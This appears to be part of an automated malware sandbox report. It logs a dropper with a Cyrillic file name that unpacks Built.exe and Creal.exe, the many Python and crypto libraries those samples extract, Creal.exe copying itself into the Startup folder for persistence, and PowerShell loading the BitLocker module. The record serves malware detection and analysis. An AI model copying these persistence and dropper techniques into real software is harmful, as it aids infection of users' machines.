              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\_cffi_backend.cp313-win_amd64.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_ARC4.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\pyexpat.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\sqlite3.dllJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\python3.dllJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\_lzma.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\_lzma.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_keccak.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_des3.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_poly1305.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\python313.dllJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Util\_strxor.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA512.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_Salsa20.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\_wmi.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_BLAKE2b.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\pyexpat.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\_uuid.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_cbc.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_chacha20.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\libcrypto-3.dllJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Util\_strxor.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_poly1305.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_keccak.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\_overlapped.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\_socket.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\_decimal.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\python313.dllJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\PublicKey\_curve448.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\_hashlib.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Protocol\_scrypt.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\select.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\libcrypto-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_ghash_clmul.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\libffi-8.dllJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_MD4.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\_bz2.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Math\_modexp.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_ofb.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_chacha20.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_cfb.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Util\_cpuid_c.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_des3.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\cryptography\hazmat\bindings\_rust.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_ed25519.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_ARC4.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_ocb.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_aes.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_aesni.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\python3.dllJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\libssl-3.dllJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_cast.pydJump to dropped file
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeFile created: C:\Users\user\Desktop\Built.exeJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_ghash_clmul.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_arc2.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_BLAKE2b.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\_overlapped.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\rar.exeJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_ocb.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Math\_modexp.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\sqlite3.dllJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_ofb.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\PublicKey\_ed25519.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_curve448.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\libffi-8.dllJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\_decimal.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_ecb.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\cryptography\hazmat\bindings\_rust.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA1.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_BLAKE2s.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_ctr.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_cfb.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\_bz2.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_aes.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_aesni.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\_multiprocessing.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\_lzma.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\_multiprocessing.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\libssl-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Protocol\_scrypt.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_des.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\sqlite3.dllJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_curve25519.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\libcrypto-3.dllJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\_asyncio.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\_ctypes.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA384.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\PublicKey\_curve25519.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\unicodedata.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_MD5.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_cast.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\_ssl.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA256.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\select.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\VCRUNTIME140_1.dllJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\PublicKey\_ec_ws.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_ed448.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_arc2.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_Salsa20.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_MD2.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\_asyncio.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\_uuid.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_SHA384.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\_wmi.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_ghash_portable.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_SHA1.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Util\_cpuid_c.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\libffi-8.dllJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_ecb.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\unicodedata.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA224.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_ghash_portable.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\_cffi_backend.cp313-win_amd64.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_RIPEMD160.pydJump to dropped file
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeFile created: C:\Users\user\Desktop\Creal.exeJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_MD4.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_ctr.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_SHA256.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\python312.dllJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\libssl-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_MD5.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_cbc.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\PublicKey\_ed448.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_ec_ws.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_SHA224.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\VCRUNTIME140_1.dllJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_SHA512.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_BLAKE2s.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\_bz2.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_des.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_RIPEMD160.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_MD2.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txtJump to behavior
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt

              Boot Survival

              barindex
              Drops PE files to the startup folder
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
